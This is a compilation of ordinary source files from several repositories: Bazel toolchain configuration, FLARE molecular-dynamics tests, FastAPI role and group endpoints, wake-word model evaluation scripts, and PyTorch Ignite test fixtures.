"%{msvc_cxx_builtin_include_directories}": " " + ",\n ".join(escaped_cxx_include_directories),
}
return msvc_vars
def _get_clang_cl_vars(repository_ctx, paths, msvc_vars):
"""Get the variables we need to populate the clang-cl toolchains."""
llvm_path = find_llvm_path(repository_ctx)
error_script = None
if msvc_vars["%{msvc_cl_path}"] == "vc_installation_error.bat":
error_script = "vc_installation_error.bat"
elif not llvm_path:
repository_ctx.template(
"clang_installation_error.bat",
paths["@bazel_tools//tools/cpp:clang_installation_error.bat.tpl"],
{"%{clang_error_message}": ""},
)
error_script = "clang_installation_error.bat"
else:
missing_tools = _find_missing_llvm_tools(repository_ctx, llvm_path)
if missing_tools:
message = "\r\n".join([
"echo. 1>&2",
"echo LLVM/Clang seems to be installed at %s 1>&2" % llvm_path,
"echo But Bazel can't find the following tools: 1>&2",
"echo %s 1>&2" % ", ".join(missing_tools),
"echo. 1>&2",
])
repository_ctx.template(
"clang_installation_error.bat",
paths["@bazel_tools//tools/cpp:clang_installation_error.bat.tpl"],
{"%{clang_error_message}": message},
)
error_script = "clang_installation_error.bat"
if error_script:
write_builtin_include_directory_paths(repository_ctx, "clang-cl", [], file_suffix = "_clangcl")
clang_cl_vars = {
"%{clang_cl_env_tmp}": "clang_cl_not_found",
"%{clang_cl_env_path}": "clang_cl_not_found",
"%{clang_cl_env_include}": "clang_cl_not_found",
"%{clang_cl_env_lib}": "clang_cl_not_found",
"%{clang_cl_cl_path}": error_script,
"%{clang_cl_link_path}": error_script,
"%{clang_cl_lib_path}": error_script,
"%{clang_cl_ml_path}": error_script,
"%{clang_cl_dbg_mode_debug_flag}": "/DEBUG",
"%{clang_cl_fastbuild_mode_debug_flag}": "/DEBUG",
"%{clang_cl_cxx_builtin_include_directories}": "",
}
return clang_cl_vars
clang_cl_path = find_llvm_tool(repository_ctx, llvm_path, "clang-cl.exe")
lld_link_path = find_llvm_tool(repository_ctx, llvm_path, "lld-link.exe")
llvm_lib_path = find_llvm_tool(repository_ctx, llvm_path, "llvm-lib.exe")
clang_version = _get_clang_version(repository_ctx, clang_cl_path)
clang_dir = llvm_path + "\\lib\\clang\\" + clang_version
clang_include_path = (clang_dir + "\\include").replace("\\", "\\\\")
clang_lib_path = (clang_dir + "\\lib\\windows").replace("\\", "\\\\")
clang_cl_include_directories = msvc_vars["%{msvc_cxx_builtin_include_directories}"] + (",\n \"%s\"" % clang_include_path)
write_builtin_include_directory_paths(repository_ctx, "clang-cl", [clang_cl_include_directories], file_suffix = "_clangcl")
clang_cl_vars = {
"%{clang_cl_env_tmp}": msvc_vars["%{msvc_env_tmp}"],
"%{clang_cl_env_path}": msvc_vars["%{msvc_env_path}"],
"%{clang_cl_env_include}": msvc_vars["%{msvc_env_include}"] + ";" + clang_include_path,
"%{clang_cl_env_lib}": msvc_vars["%{msvc_env_lib}"] + ";" + clang_lib_path,
"%{clang_cl_cxx_builtin_include_directories}": clang_cl_include_directories,
"%{clang_cl_cl_path}": clang_cl_path,
"%{clang_cl_link_path}": lld_link_path,
"%{clang_cl_lib_path}": llvm_lib_path,
"%{clang_cl_ml_path}": msvc_vars["%{msvc_ml_path}"],
# LLVM's lld-link.exe doesn't support /DEBUG:FASTLINK.
"%{clang_cl_dbg_mode_debug_flag}": "/DEBUG",
"%{clang_cl_fastbuild_mode_debug_flag}": "/DEBUG",
}
return clang_cl_vars
def configure_windows_toolchain(repository_ctx):
"""Configure C++ toolchain on Windows."""
paths = resolve_labels(repository_ctx, [
"@bazel_tools//tools/cpp:BUILD.windows.tpl",
"@bazel_tools//tools/cpp:windows_cc_toolchain_config.bzl",
"@bazel_tools//tools/cpp:armeabi_cc_toolchain_config.bzl",
"@bazel_tools//tools/cpp:vc_installation_error.bat.tpl",
"@bazel_tools//tools/cpp:msys_gcc_installation_error.bat",
"@bazel_tools//tools/cpp:clang_installation_error.bat.tpl",
])
repository_ctx.symlink(
paths["@bazel_tools//tools/cpp:windows_cc_toolchain_config.bzl"],
"windows_cc_toolchain_config.bzl",
)
repository_ctx.symlink(
paths["@bazel_tools//tools/cpp:armeabi_cc_toolchain_config.bzl"],
"armeabi_cc_toolchain_config.bzl",
)
repository_ctx.symlink(
paths["@bazel_tools//tools/cpp:msys_gcc_installation_error.bat"],
"msys_gcc_installation_error.bat",
)
template_vars = dict()
msvc_vars = _get_msvc_vars(repository_ctx, paths)
template_vars.update(msvc_vars)
template_vars.update(_get_clang_cl_vars(repository_ctx, paths, msvc_vars))
template_vars.update(_get_msys_mingw_vars(repository_ctx))
repository_ctx.template(
"BUILD",
paths["@bazel_tools//tools/cpp:BUILD.windows.tpl"],
template_vars,
)
``` |
{
"source": "jonpvandermause/flare",
"score": 2
} |
#### File: flare/tests/test_OTF.py
```python
import pytest
import os
import sys
import numpy as np
from flare.otf import OTF
from flare.gp import GaussianProcess
from flare.struc import Structure
import flare.kernels as en
def cleanup_espresso_run(target: str = None):
os.system('rm pwscf.out')
os.system('rm pwscf.wfc')
os.system('rm -r pwscf.save')
os.system('rm pwscf.in')
os.system('rm pwscf.wfc1')
os.system('rm pwscf.wfc2')
if target:
os.system('rm ' + target)
# ------------------------------------------------------
# test otf runs
# ------------------------------------------------------
def test_otf_h2():
"""
Test that an otf run can survive going for more steps
:return:
"""
os.system('cp ./test_files/qe_input_1.in ./pwscf.in')
qe_input = './pwscf.in'
dt = 0.0001
number_of_steps = 20
cutoffs = np.array([5])
pw_loc = os.environ.get('PWSCF_COMMAND')
std_tolerance_factor = -0.1
# make gp model
kernel = en.two_body
kernel_grad = en.two_body_grad
hyps = np.array([1, 1, 1])
hyp_labels = ['Signal Std', 'Length Scale', 'Noise Std']
energy_force_kernel = en.two_body_force_en
gp = \
GaussianProcess(kernel=kernel,
kernel_grad=kernel_grad,
hyps=hyps,
cutoffs=cutoffs,
hyp_labels=hyp_labels,
energy_force_kernel=energy_force_kernel,
maxiter=50)
otf = OTF(qe_input, dt, number_of_steps, gp, pw_loc,
std_tolerance_factor, init_atoms=[0],
calculate_energy=True, max_atoms_added=1,
output_name='h2_otf.out')
otf.run()
os.system('mkdir test_outputs')
os.system('mv h2_otf.out test_outputs')
cleanup_espresso_run()
def test_otf_al():
"""
Test that an otf run can survive going for more steps
:return:
"""
os.system('cp ./test_files/qe_input_2.in ./pwscf.in')
qe_input = './pwscf.in'
dt = 0.001
number_of_steps = 100
cutoffs = np.array([3.9, 3.9])
pw_loc = os.environ.get('PWSCF_COMMAND')
std_tolerance_factor = 1
max_atoms_added = 2
freeze_hyps = 3
# make gp model
kernel = en.three_body
kernel_grad = en.three_body_grad
hyps = np.array([0.1, 1, 0.01])
hyp_labels = ['Signal Std', 'Length Scale', 'Noise Std']
energy_force_kernel = en.three_body_force_en
gp = \
GaussianProcess(kernel=kernel,
kernel_grad=kernel_grad,
hyps=hyps,
cutoffs=cutoffs,
hyp_labels=hyp_labels,
energy_force_kernel=energy_force_kernel,
maxiter=50)
otf = OTF(qe_input, dt, number_of_steps, gp, pw_loc,
std_tolerance_factor, init_atoms=[0],
calculate_energy=True, output_name='al_otf.out',
freeze_hyps=freeze_hyps, skip=5,
max_atoms_added=max_atoms_added)
otf.run()
os.system('mkdir test_outputs')
os.system('mv al_otf.out test_outputs')
cleanup_espresso_run()
```
#### File: flare/tests/test_util.py
```python
from flare.util import element_to_Z
import pytest
def test_element_to_Z():
for i in range(120):
assert element_to_Z(i) == i
for pair in zip(['H', 'C', 'O', 'Og'], [1, 6, 8, 118]):
assert element_to_Z(pair[0]) == pair[1]
def test_elt_warning():
with pytest.warns(Warning):
element_to_Z('Fe2')
``` |
{
"source": "jonra1993/fastapi-alembic-sqlmodel-async",
"score": 2
} |
#### File: api_v1/endpoints/group.py
```python
from app.models.user import User
from app.schemas.common import (
IGetResponseBase,
IPostResponseBase,
IPutResponseBase,
)
from fastapi_pagination import Page, Params
from app.schemas.group import IGroupCreate, IGroupRead, IGroupReadWithUsers, IGroupUpdate, IGroupReadWithUsers
from sqlmodel.ext.asyncio.session import AsyncSession
from fastapi import APIRouter, Depends, HTTPException
from app.api import deps
from app import crud
from uuid import UUID
from app.schemas.role import IRoleEnum
router = APIRouter()
@router.get("/group", response_model=IGetResponseBase[Page[IGroupRead]])
async def get_groups(
params: Params = Depends(),
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
groups = await crud.group.get_multi_paginated(db_session, params=params)
return IGetResponseBase[Page[IGroupRead]](data=groups)
@router.get("/group/{group_id}", response_model=IGetResponseBase[IGroupReadWithUsers])
async def get_group_by_id(
group_id: UUID,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
group = await crud.group.get(db_session, id=group_id)
return IGetResponseBase[IGroupReadWithUsers](data=group)
@router.post("/group", response_model=IPostResponseBase[IGroupRead])
async def create_group(
group: IGroupCreate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin, IRoleEnum.manager])),
):
new_group = await crud.group.create(db_session, obj_in=group, created_by_id=current_user.id)
return IPostResponseBase[IGroupRead](data=new_group)
@router.put("/group/{group_id}", response_model=IPutResponseBase[IGroupRead])
async def update_group(
group_id: UUID,
group: IGroupUpdate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin, IRoleEnum.manager])),
):
group_current = await crud.group.get(db_session=db_session, id=group_id)
if not group_current:
raise HTTPException(status_code=404, detail="Group not found")
group_updated = await crud.group.update(db_session, obj_current=group_current, obj_new=group)
return IPutResponseBase[IGroupRead](data=group_updated)
@router.post("/group/add_user/{user_id}/{group_id}", response_model=IPostResponseBase[IGroupRead])
async def add_user_to_group(
user_id: UUID,
group_id: UUID,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin, IRoleEnum.manager])),
):
user = await crud.user.get(db_session=db_session, id=user_id)
if not user:
raise HTTPException(status_code=404, detail="User not found")
group = await crud.group.add_user_to_group(db_session, user=user, group_id=group_id)
return IPostResponseBase[IGroupRead](message="User added to group", data=group)
```
#### File: api_v1/endpoints/role.py
```python
from app.models.user import User
from app.schemas.common import (
IGetResponseBase,
IPostResponseBase,
IPutResponseBase,
)
from fastapi_pagination import Page, Params
from app.schemas.role import IRoleCreate, IRoleRead, IRoleUpdate
from sqlmodel.ext.asyncio.session import AsyncSession
from fastapi import APIRouter, Depends, HTTPException
from app.api import deps
from app import crud
from uuid import UUID
from app.schemas.role import IRoleEnum
router = APIRouter()
@router.get("/role", response_model=IGetResponseBase[Page[IRoleRead]])
async def get_roles(
params: Params = Depends(),
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
roles = await crud.role.get_multi_paginated(db_session, params=params)
return IGetResponseBase[Page[IRoleRead]](data=roles)
@router.get("/role/{role_id}", response_model=IGetResponseBase[IRoleRead])
async def get_role_by_id(
role_id: UUID,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user()),
):
role = await crud.role.get(db_session, id=role_id)
return IGetResponseBase[IRoleRead](data=role)
@router.post("/role", response_model=IPostResponseBase[IRoleRead])
async def create_role(
role: IRoleCreate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin])),
):
new_permission = await crud.role.create(db_session, obj_in=role)
return IPostResponseBase[IRoleRead](data=new_permission)
@router.put("/role/{role_id}", response_model=IPutResponseBase[IRoleRead])
async def update_permission(
role_id: UUID,
role: IRoleUpdate,
db_session: AsyncSession = Depends(deps.get_db),
current_user: User = Depends(deps.get_current_user(required_roles=[IRoleEnum.admin])),
):
current_role = await crud.role.get(db_session=db_session, id=role_id)
if not current_role:
raise HTTPException(status_code=404, detail="Permission not found")
updated_role = await crud.role.update(db_session, obj_current=current_role, obj_new=role)
return IPutResponseBase[IRoleRead](data=updated_role)
```
#### File: app/api/deps.py
```python
from typing import AsyncGenerator, List
from fastapi import Depends, HTTPException, status
from fastapi.security import OAuth2PasswordBearer
from jose import jwt
from app.models.user import User
from pydantic import ValidationError
from app import crud
from app.core import security
from app.core.config import settings
from app.db.session import SessionLocal
from sqlmodel.ext.asyncio.session import AsyncSession
from app.schemas.common import IMetaGeneral
reusable_oauth2 = OAuth2PasswordBearer(
tokenUrl=f"{settings.API_V1_STR}/login/access-token"
)
async def get_db() -> AsyncGenerator[AsyncSession, None]:
async with SessionLocal() as session:
yield session
async def get_general_meta(
db_session: AsyncSession = Depends(get_db)
) -> IMetaGeneral:
current_roles = await crud.role.get_multi(db_session, skip=0, limit=100)
return IMetaGeneral(roles=current_roles)
def get_current_user(required_roles: List[str] = None) -> User:
async def current_user(
db_session: AsyncSession = Depends(get_db),
token: str = Depends(reusable_oauth2)
) -> User:
try:
payload = jwt.decode(token, settings.SECRET_KEY, algorithms=[security.ALGORITHM])
except (jwt.JWTError, ValidationError):
raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN,
detail="Could not validate credentials",
)
user: User = await crud.user.get_user_by_id(db_session, id=payload["sub"])
if not user:
raise HTTPException(status_code=404, detail="User not found")
if not user.is_active:
raise HTTPException(status_code=400, detail="Inactive user")
if required_roles:
is_valid_role = False
for role in required_roles:
if role == user.role.name:
is_valid_role = True
if is_valid_role == False:
raise HTTPException(
status_code=403,
detail=f'Role "{required_roles}" is required to perform this action',
)
return user
return current_user
``` |
{
"source": "jonra1993/WakeWord-Detection",
"score": 3
} |
#### File: nlu/parsers/entity.py
```python
from typing import Any, Dict
def parse(metadata: Dict[str, Any], raw_value: str) -> str:
"""Entity Parser
Args:
metadata (Dict[str, Any]): metadata for entity slot
raw_value (str): tagged entity
Returns:
(str): tagged entity
"""
return raw_value
```
#### File: nlu/parsers/selset.py
```python
from typing import Any, Dict, Union
def parse(metadata: Dict[str, Any], raw_value: str) -> Union[str, None]:
"""Selset Parser
Args:
metadata (Dict[str, Any]): slot metadata
raw_value (str): value tagged by the model
Returns:
Union[str, None]: selset or None if invalid
"""
normalized = raw_value.lower()
selections = metadata.get("selections", [])
for selection in selections:
name = selection.get("name")
if name.lower() == normalized:
return name
aliases = selection.get("aliases")
for alias in aliases:
if alias.lower() == normalized:
return name
return None
```
#### File: spokestack/tts/manager.py
```python
from streamp3 import MP3Decoder # type: ignore
class TextToSpeechManager:
"""Manages tts client and io target.
Args:
client: Text to speech client that returns encoded mp3 audio
output: Audio io target
"""
def __init__(self, client, output) -> None:
self._client = client
self._output = output
def synthesize(self, utterance: str, mode: str, voice: str) -> None:
"""Synthesizes the given utterance with the voice and format provided.
Args:
utterance (str): string that needs to be rendered as speech.
mode (str): synthesis mode to use with utterance. text, ssml, markdown, etc.
voice (str): name of the tts voice.
"""
stream = self._client.synthesize(utterance, mode, voice)
stream = SequenceIO(stream)
for frame in MP3Decoder(stream):
self._output.write(frame)
def close(self) -> None:
""" Closes the client and output. """
self._client = None
self._output = None
class SequenceIO:
""" Wrapper that allows for incrementally received audio to be decoded. """
def __init__(self, sequence):
self._sequence = iter(sequence)
def read(self, size=None):
try:
return next(self._sequence)
except StopIteration:
return b""
```
#### File: WakeWord-Detection/utils/time_tf_models.py
```python
from json import load
import os
import sys
import time
import argparse
import numpy as np
from tqdm import tqdm
from tensorflow.keras.models import load_model
import tensorflow.lite as tflite
def time_tf_model(model, num_timesteps, num_features, model_type, num_runs):
# define model input shape
if model_type == 'Wavenet':
X_shape = (1, num_timesteps, num_features)
elif model_type == 'CRNN':
X_shape = (1, num_features, num_timesteps, 1)
# create random input vector
X = np.array(np.random.random_sample(X_shape), dtype=np.float32)
# prime the Tensorflow graph, first run is slow
model.predict(X)
total_time = 0.0
for _ in tqdm(range(num_runs)):
start = time.perf_counter()
model.predict(X)
total_time += time.perf_counter() - start
return total_time/num_runs
def time_tf_lite_models(encode, detect, num_runs):
# allocate input and output tensors for models
encode.allocate_tensors()
detect.allocate_tensors()
# Get input and output information for models.
encode_input_details = encode.get_input_details()
encode_output_details = encode.get_output_details()
detect_input_details = detect.get_input_details()
# Create random input vector
X_shape = encode_input_details[0]['shape']
X = np.array(np.random.random_sample(X_shape), dtype=np.float32)
# prime TF-Lite models, first time is slow
encode.set_tensor(encode_input_details[0]['index'], X)
encode.invoke()
encoded = encode.get_tensor(encode_output_details[0]['index'])
detect.set_tensor(detect_input_details[0]['index'], encoded)
# get average inference time
total_time = 0.0
for _ in tqdm(range(num_runs)):
start = time.perf_counter()
encode.set_tensor(encode_input_details[0]['index'], X)
encode.invoke()
encoded = encode.get_tensor(encode_output_details[0]['index'])
detect.set_tensor(detect_input_details[0]['index'], encoded)
total_time += time.perf_counter() - start
return total_time/num_runs
def load_wavenet(model_dir):
return load_model(args.tf_model_dir)
def load_crnn(model_dir):
return load_model(args.tf_model_dir)
def load_tensorflow_model(model_dir, model_type):
# load the appropriate model type
if args.model_type == 'Wavenet':
tf_model = load_wavenet(args.tf_model_dir)
elif args.model_type == 'CRNN':
tf_model = load_crnn(args.tf_model_dir)
return tf_model
def time_models(args):
# Load the Tensorflow model
tf_model = load_tensorflow_model(args.tf_model_dir, args.model_type)
# run timings on Tensorflow model
print(f'Running timings on Tensorflow {args.model_type} model')
avg_time_tf = time_tf_model(tf_model, args.timesteps, args.num_features, args.model_type, args.num_runs)
print(f'Tensorflow average time: {avg_time_tf} secs')
# Load Tensorflow Lite models
tf_lite_encode = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'encode.tflite'))
tf_lite_detect = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'detect.tflite'))
# run timings on Tensorflow Lite models
print(f'Running timings on Tensorflow-Lite {args.model_type} models')
avg_time_tf_lite = time_tf_lite_models(tf_lite_encode, tf_lite_detect, args.num_runs)
print(f'TF-Lite average time: {avg_time_tf_lite} secs')
# run timings on quantiezed Tensorflow Lite models
if args.time_quantized:
tf_lite_encode = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'encode-quant.tflite'))
tf_lite_detect = tflite.Interpreter(model_path=os.path.join(args.tf_lite_model_dir, 'detect-quant.tflite'))
print(f'Running timings on quantized Tensorflow-Lite {args.model_type} models')
avg_time_tf_lite = time_tf_lite_models(tf_lite_encode, tf_lite_detect, args.num_runs)
print(f'TF-Lite average time: {avg_time_tf_lite} secs')
def parse_args():
parser = argparse.ArgumentParser(description='Gets inference timings for Tensorflow and TF-Lite versions of Wavenet models.')
parser.add_argument('--model_type', type=str, default='Wavenet', choices=['CRNN', 'Wavenet'], help='Model type being evaluated.')
parser.add_argument('--tf_model_dir', type=str, default='tf_models', help='Directory with Tensorflow models')
parser.add_argument('--tf_lite_model_dir', type=str, default='tf_lite_models', help='Directory with Tensorflow Lite models')
parser.add_argument('--num_features', type=float, default=40, help='Number of features per-timestep')
parser.add_argument('--timesteps', type=int, default=182, help='Number of timesteps per example, None for variable length')
parser.add_argument('--num_runs', type=int, default=10, help='Number of runs to get average infernce time')
parser.add_argument('--time_quantized', action='store_true', help='Time quantized version of TF-Lite models')
return parser.parse_args()
def main(args):
start = time.time()
time_models(args)
print(f'Script completed in {time.time()-start:.2f} secs')
return 0
if __name__ == '__main__':
args = parse_args()
sys.exit(main(args))
```
#### File: wwdetect/CRNN/evaluate.py
```python
import sys
import os
import argparse
from tqdm import tqdm
import tensorflow as tf
from tensorflow.keras import metrics, models
from sklearn.metrics import balanced_accuracy_score, accuracy_score
import numpy as np
from matplotlib import pyplot as plt
from dataloader import HeySnipsPreprocessed
from tensorflow_tflite import TFLiteModel
# Metrics to calculate for each model.
METRICS = [
metrics.TruePositives(name='tp'),
metrics.FalsePositives(name='fp'),
metrics.TrueNegatives(name='tn'),
metrics.FalseNegatives(name='fn'),
metrics.Precision(name='precision'),
metrics.Recall(name='recall')
]
def prep_test_data(data_path, input_frames, input_features, ctc):
'''
Small function to load test data.
:param data_path: Path to .h5 file containing data.
:param input_frames: Number of input frames model expects.
:param input_features: Number of input features model expects.
:param ctc: Boolean, if model CTC-based.
:return: Loaded test generator.
'''
test_generator = HeySnipsPreprocessed([os.path.join(data_path, "test.h5")],
batch_size=0,
frame_num=input_frames,
feature_num=input_features,
ctc=ctc)
return test_generator
def eval_basics(encoder, decoder, test_generator):
'''
Evaluation for model trained with cross-entropy loss
(two output nodes, first is not wakeword, second is
wakeword).
:param encoder: Preloaded encoder model.
:param decoder: Preloaded decoder model.
:param test_generator: Generator for test data.
:return: Dict with all statistics.
'''
X, y = test_generator[0]
keys = test_generator.list_IDs_temp
FAs = []
FRs = []
X = X.astype(np.float32)
y = y[:,1]
y_pred = []
index = 0
for sample in tqdm(X):
sample = np.expand_dims(sample, axis=0)
y_pred_sample = encoder(sample)[0]
y_pred_sample = np.squeeze(decoder(y_pred_sample)[0])
y_pred.append(float(y_pred_sample[1]))
index += 1
y_pred = np.array(y_pred)
y_pred_class = np.where(y_pred >= 0.5,1,0)
for index, (prediction, actual) in enumerate(zip(y_pred_class, y)):
if prediction == 1 and actual == 0:
FAs.append(keys[index])
if prediction == 0 and actual == 1:
FRs.append(keys[index])
print("False accept files:", FAs)
print("False reject files:", FRs)
acc = accuracy_score(y, y_pred_class)
bal_acc = balanced_accuracy_score(y, y_pred_class)
stats = {}
for metric in METRICS:
metric.reset_states()
metric.update_state(y,y_pred_class)
print(f"{metric.name}: {metric.result().numpy()}")
stats[metric.name] = metric.result().numpy()
print(f"accuracy: {acc}")
print(f"balanced accuracy: {bal_acc}")
stats["accuracy"] = acc
stats["balanced accuracy"] = bal_acc
return stats
def eval_CTC(encoder, decoder, test_generator):
'''
Evaluation for model trained with CTC loss.
:param encoder: Preloaded encoder tflite model.
:param decoder: Preloaded decoder tflite model.
:param test_generator: Generator containing test data.
:return: None.
'''
X, y = test_generator[0]
X = X.astype(np.float32)
y_seq = [tf.strings.reduce_join(test_generator.num2char(y_i)).numpy().decode("utf-8") for y_i in y]
y_pred = []
index = 0
# Iterate through all test samples and decode output of model.
for sample in tqdm(X):
sample = np.expand_dims(sample, axis=0)
y_encode_sample = encoder(sample)[0]
y_decode_sample = decoder(y_encode_sample)[0]
input_len = np.ones(y_decode_sample.shape[0]) * y_decode_sample.shape[1]
# Final index must change based on how long the max target sequence length is.
# Current setup is two, sequences are '[HEY][SNIPS]' and '[OTHER]'.
result = tf.keras.backend.ctc_decode(y_decode_sample, input_length=input_len, greedy=True)[0][0][:, :2]
result_labels = "".join(test_generator.num2char(result[0].numpy()))
# Toggle to plot posterior trajectories.
if not "plot_posteriors" and y_seq[index] == "[HEY][SNIPS]":
labels = list(test_generator.char2num_dict.keys())[1:] + ['[BLANK]']
target = "".join([test_generator.num2char_dict[num] for num in y[index] if num >= 0])
plt.imshow(np.squeeze(y_decode_sample).T, cmap='Greys')
plt.yticks(ticks=list(range(len(labels))), labels=labels)
plt.xticks(ticks=list(range(int(input_len[0]))))
plt.xlabel("timepoint")
plt.title("Target sequence: " + str(target))
plt.show()
y_pred += [result_labels]
index += 1
# Convert sequences to classes.
y_pred_class = [1 if y_pred_i == "[HEY][SNIPS]" else 0 for y_pred_i in y_pred]
y_true_class = [1 if y_i == "[HEY][SNIPS]" else 0 for y_i in y_seq]
# Calculate and output metrics.
bal_acc = balanced_accuracy_score(y_true_class, y_pred_class)
for metric in METRICS:
metric.update_state(y_true_class,y_pred_class)
print(f"{metric.name}: {metric.result().numpy()}")
print(f"balanced accuracy: {bal_acc}")
def parse_args():
'''
Parse commandline arguments.
:return: Arguments dict.
'''
parser = argparse.ArgumentParser(description='Evaluates CRNN model(s).')
parser.add_argument('--data_dir', type=str, default='/Users/amie/Desktop/OHSU/CS606 - Deep Learning II/FinalProject/spokestack-python/data_speech_isolated/silero', help='Directory where test data is stored.')
parser.add_argument('--model_dir', type=str, default='models/Arik_CRNN_data_nosilence_enhanced')
args = parser.parse_args()
return args
def load_model(encode_path, detect_path):
'''
Helper function to load tflite model.
:param encode_path: Path to encoder model.
:param detect_path: Path to detect model.
:return: Loaded models.
'''
encode_model: TFLiteModel = TFLiteModel(
model_path=encode_path
)
detect_model: TFLiteModel = TFLiteModel(
model_path=detect_path
)
return encode_model, detect_model
def main(args):
encode_model, detect_model = load_model(os.path.join(args.model_dir, "encode.tflite"),
os.path.join(args.model_dir, "detect.tflite"))
if "CTC" in args.model_dir:
test = prep_test_data(args.data_dir, ctc=True, input_features=40, input_frames=151)
eval_CTC(encode_model, detect_model, test)
else:
test = prep_test_data(args.data_dir, ctc=False, input_features=40, input_frames=151)
eval_basics(encode_model, detect_model, test)
if __name__ == "__main__":
args = parse_args()
sys.exit(main(args))
``` |
{
"source": "jonrbates/ignite",
"score": 2
} |
#### File: tests/ignite/conftest.py
```python
import shutil
import tempfile
import pytest
import torch
import torch.distributed as dist
@pytest.fixture()
def dirname():
path = tempfile.mkdtemp()
yield path
shutil.rmtree(path)
@pytest.fixture()
def local_rank(worker_id):
""" use a different account in each xdist worker """
if "gw" in worker_id:
return int(worker_id.replace("gw", ""))
elif "master" == worker_id:
return 0
raise RuntimeError("Can not get rank from worker_id={}".format(worker_id))
@pytest.fixture()
def distributed_context_single_node_nccl(local_rank):
import os
if "WORLD_SIZE" not in os.environ:
os.environ["WORLD_SIZE"] = "{}".format(torch.cuda.device_count())
dist_info = {
"backend": "nccl",
"world_size": int(os.environ["WORLD_SIZE"]),
"rank": local_rank,
"init_method": "tcp://localhost:2223",
}
dist.init_process_group(**dist_info)
dist.barrier()
torch.cuda.device(local_rank)
yield {"local_rank": local_rank}
dist.barrier()
dist.destroy_process_group()
@pytest.fixture()
def distributed_context_single_node_gloo(local_rank):
import os
from datetime import timedelta
if "WORLD_SIZE" not in os.environ:
os.environ["WORLD_SIZE"] = "1"
dist_info = {
"backend": "gloo",
"world_size": int(os.environ["WORLD_SIZE"]),
"rank": local_rank,
"init_method": "tcp://localhost:2222",
"timeout": timedelta(seconds=60),
}
dist.init_process_group(**dist_info)
dist.barrier()
yield {"local_rank": local_rank}
dist.barrier()
dist.destroy_process_group()
@pytest.fixture()
def multi_node_conf(local_rank):
import os
assert "node_id" in os.environ
assert "nnodes" in os.environ
assert "nproc_per_node" in os.environ
node_id = int(os.environ["node_id"])
nnodes = int(os.environ["nnodes"])
nproc_per_node = int(os.environ["nproc_per_node"])
out = {
"world_size": nnodes * nproc_per_node,
"rank": local_rank + node_id * nproc_per_node,
"local_rank": local_rank,
}
return out
@pytest.fixture()
def distributed_context_multi_node_gloo(multi_node_conf):
import os
assert "MASTER_ADDR" in os.environ
assert "MASTER_PORT" in os.environ
dist_info = {
"backend": "gloo",
"init_method": "env://",
"world_size": multi_node_conf["world_size"],
"rank": multi_node_conf["rank"],
}
dist.init_process_group(**dist_info)
dist.barrier()
yield multi_node_conf
dist.barrier()
dist.destroy_process_group()
@pytest.fixture()
def distributed_context_multi_node_nccl(multi_node_conf):
import os
assert "MASTER_ADDR" in os.environ
assert "MASTER_PORT" in os.environ
dist_info = {
"backend": "nccl",
"init_method": "env://",
"world_size": multi_node_conf["world_size"],
"rank": multi_node_conf["rank"],
}
dist.init_process_group(**dist_info)
dist.barrier()
torch.cuda.device(multi_node_conf["local_rank"])
yield multi_node_conf
dist.barrier()
dist.destroy_process_group()
```
#### File: contrib/handlers/test_time_profilers.py
```python
import os
import time
from pytest import approx
from ignite.contrib.handlers.time_profilers import BasicTimeProfiler
from ignite.engine import Engine, Events
def _do_nothing_update_fn(engine, batch):
pass
def get_prepared_engine(true_event_handler_time):
dummy_trainer = Engine(_do_nothing_update_fn)
@dummy_trainer.on(Events.STARTED)
def delay_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.COMPLETED)
def delay_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_STARTED)
def delay_epoch_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.EPOCH_COMPLETED)
def delay_epoch_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_STARTED)
def delay_iter_start(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.ITERATION_COMPLETED)
def delay_iter_complete(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_STARTED)
def delay_get_batch_started(engine):
time.sleep(true_event_handler_time)
@dummy_trainer.on(Events.GET_BATCH_COMPLETED)
def delay_get_batch_completed(engine):
time.sleep(true_event_handler_time)
return dummy_trainer
def test_dataflow_timer():
true_dataflow_time_per_ele = 0.1
true_max_epochs = 1
true_num_iters = 2
def dummy_data_loader(data):
while True:
for d in data:
time.sleep(true_dataflow_time_per_ele)
yield d
dummy_data = range(true_num_iters)
profiler = BasicTimeProfiler()
dummy_trainer = Engine(_do_nothing_update_fn)
profiler.attach(dummy_trainer)
dummy_trainer.run(dummy_data_loader(dummy_data), max_epochs=true_max_epochs, epoch_length=true_num_iters)
results = profiler.get_results()
dataflow_results = results["dataflow_stats"]
assert dataflow_results["min/index"][0] == approx(true_dataflow_time_per_ele, abs=1e-1)
assert dataflow_results["max/index"][0] == approx(true_dataflow_time_per_ele, abs=1e-1)
assert dataflow_results["mean"] == approx(true_dataflow_time_per_ele, abs=1e-1)
assert dataflow_results["std"] == approx(0.0, abs=1e-1)
assert dataflow_results["total"] == approx(true_num_iters * true_dataflow_time_per_ele, abs=1e-1)
def test_processing_timer():
true_processing_time = 0.1
true_max_epochs = 2
true_num_iters = 2
def train_updater(engine, batch):
time.sleep(true_processing_time)
profiler = BasicTimeProfiler()
dummy_trainer = Engine(train_updater)
profiler.attach(dummy_trainer)
dummy_trainer.run(range(true_num_iters), max_epochs=true_max_epochs)
results = profiler.get_results()
processing_results = results["processing_stats"]
